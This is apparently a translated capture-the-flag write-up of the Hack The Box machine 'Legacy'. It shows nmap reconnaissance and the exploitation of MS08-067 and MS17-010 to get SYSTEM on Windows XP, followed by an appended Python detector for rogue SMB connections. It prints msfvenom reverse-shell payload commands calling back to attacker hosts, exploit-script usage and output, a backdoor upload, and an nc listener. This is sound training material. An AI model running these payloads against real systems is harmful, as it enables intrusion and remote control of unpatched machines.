Reconnaissance
Standard nmap scan
root@kali# nmap 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:30 EST
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 13.43 seconds
root@kali# nmap -sU -p- --min-rate 10000 -oA nmap/alludp 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:34 EST
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
Not shown: 65534 open|filtered ports
PORT STATE SERVICE
137/udp open netbios-ns
Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds
root@kali# nmap -sC -sV -p 139,445 -oA nmap/scripts 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 13:37 EST
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h08m26s, deviation: 1h24m51s, median: -5h08m26s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b2:7b:09 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2019-02-19T17:29:16+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 257.42 seconds
445 - SMB
Let's see what the shares expose.
First with smbmap (I will publish an SMB usage guide shortly, stay tuned):
root@kali# smbmap -H 10.10.10.4
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.4...
[+] IP: 10.10.10.4:445 Name: 10.10.10.4
Disk Permissions
---- -----------
[!] Access Denied
root@kali# smbclient -N -L //10.10.10.4
session setup failed: NT_STATUS_INVALID_PARAMETER
Both approaches are denied access.
Vuln
nmap -p 445 --script vuln 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 13:27 EST
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 5.49 seconds
The scan reveals two very well-known vulnerabilities: MS08-067 and MS17-010.
Then just go at it with msf; we'll look at the manual approach afterwards.
bin hasn't been working lately, so I couldn't find the exploit, and Baidu won't let me search for it either.
One more thing: msf cannot match the target automatically, so you have to select the target by hand. I got it on the sixth try: target Windows XP SP3, language: English.
That's it.
Getting SYSTEM
MS08-067
Exploit PoC used: raw.githubusercontent.com/jivoi/pente…
The script itself documents in detail how it is used; I translate that here.
First, build a reverse-shell payload with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
Then you need to guess the target's OS version. The script's usage banner (Python 2) lists the choices:
# Usage banner from the exploit script (Python 2 print statements)
import sys

print '\nUsage: %s <target ip> <os #> <Port #>\n' % sys.argv[0]
print 'Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445'
print 'Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)'
print 'Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal'
print 'Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English'
print 'Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)'
print 'Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)'
print 'Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)'
print ''
print 'FYI: nmap has a good OS discovery script that pairs well with this exploit:'
print 'nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1'
The script hints that nmap can be used to guess the OS version, but our earlier reconnaissance did not reveal the target's exact version, so we can only guess. The answer is option 6, i.e. Windows XP SP3 English (NX).
Now run the script:
root@kali# python ms08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################
$ This version requires the Python Impacket library version to 0_9_17 or newer.
$
$ Here's how to upgrade if necessary:
$
$ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$ cd impacket
$ pip install .
#######################################################################
Windows XP SP3 English (NX)
[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish
Remember to have an nc listener open to catch the shell.
Done.
MS17-010
Not much more to say; the process is exactly the same as what I wrote in the Blue write-up. For those preparing for OSCP, I recommend not using msf but the manual method from my Blue write-up.
Manual
Use a Python script: GitHub – helviojunior/MS17-010: MS17-010
From that repo I use send_and_execute.py to upload our reverse-shell binary.
msfvenom -p windows/x64/shell_reverse_tcp -a x64 --platform windows LHOST=10.10.16.7 LPORT=4444 -f exe -o backdoor.exe
That creates the backdoor.
python send_and_execute.py 10.10.10.40 backdoor.exe
Then run it with python.
Finally, open an nc listener:
nc -lvnp 4444
I just copied and pasted these here.
Post-exploitation
One thing worth mentioning: the XP file system differs a bit from Windows 7 and later.
User files live in a folder under the root called "Document and ..." something; hopefully you won't end up unable to find the desktop.
Also, most of the commands we know are not available on XP, for example whoami; we can share one out over SMB:
root@kali# smbserver.py a /usr/share/windows-binaries/
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Like this.
Then on the target host:
C:\WINDOWS\system32>\\10.10.14.14\a\whoami.exe
NT AUTHORITY\SYSTEM
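As an added example (not from the original post and not part of Impacket), here is the detection a defender would run over connection logs for the step just shown: a host pulling and executing a binary from an SMB share that is not one of its file servers. The log format, the second client address, the approved file-server list and the corporate range are constructed assumptions; only 10.10.10.4 and 10.10.14.14 come from the write-up.

```python
import ipaddress
from collections import defaultdict

# Constructed sample connection records (not real logs), one TCP connection per line:
# "timestamp src_ip dst_ip dst_port". Lines 3-4 replay the write-up's step: the XP host
# (10.10.10.4) opening SMB to the attacker's impacket smbserver (10.10.14.14).
SAMPLE_CONNECTIONS = """\
2019-02-19T17:30:01 10.10.10.4 10.10.10.1 445
2019-02-19T17:30:02 10.10.10.4 10.10.10.1 445
2019-02-19T17:31:10 10.10.10.4 10.10.14.14 445
2019-02-19T17:31:11 10.10.10.4 10.10.14.14 445
2019-02-19T17:32:00 10.10.10.12 10.10.10.1 139
2019-02-19T17:33:00 10.10.10.4 10.10.10.1 80
malformed line
"""

# Assumptions for the example: one sanctioned file server, one corporate range.
APPROVED_FILE_SERVERS = {'10.10.10.1'}
CORPORATE_NETS = [ipaddress.ip_network('10.10.10.0/24')]
SMB_PORTS = {'139', '445'}


def is_corporate(ip):
    """True if ip parses and lies inside one of our ranges; unparsable input is 'not ours'."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in CORPORATE_NETS)


def find_rogue_smb(log_text):
    """Return {(src, dst, dport): count} for SMB connections from corporate hosts to
    any server that is not on the approved list. Malformed lines are skipped."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        _ts, src, dst, dport = parts
        if dport not in SMB_PORTS:
            continue
        if not is_corporate(src) or dst in APPROVED_FILE_SERVERS:
            continue
        hits[(src, dst, dport)] += 1
    return dict(hits)


def alerts(log_text):
    """Human-readable alert lines; destinations outside the corporate range come first."""
    out = []
    ordered = sorted(find_rogue_smb(log_text).items(),
                     key=lambda kv: (is_corporate(kv[0][1]), kv[0]))
    for (src, dst, dport), n in ordered:
        scope = 'inside' if is_corporate(dst) else 'OUTSIDE'
        out.append(f'{src} -> {dst}:{dport} x{n} ({scope} corporate range, '
                   'not an approved file server)')
    return out


if __name__ == '__main__':
    for a in alerts(SAMPLE_CONNECTIONS):
        print(a)
```

On a real network this is one of the cheapest signals for the post-exploitation step above: a workstation or server has no business speaking SMB to an address that is not a known file server, least of all one outside the corporate range, so the allow-list can be short and the alert rate stays low.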
That's the end of today's article in the HTB series, Windows box: Legacy. Thank you for reading.
Please retain the source when reposting: https://bianchenghao.cn/21835.html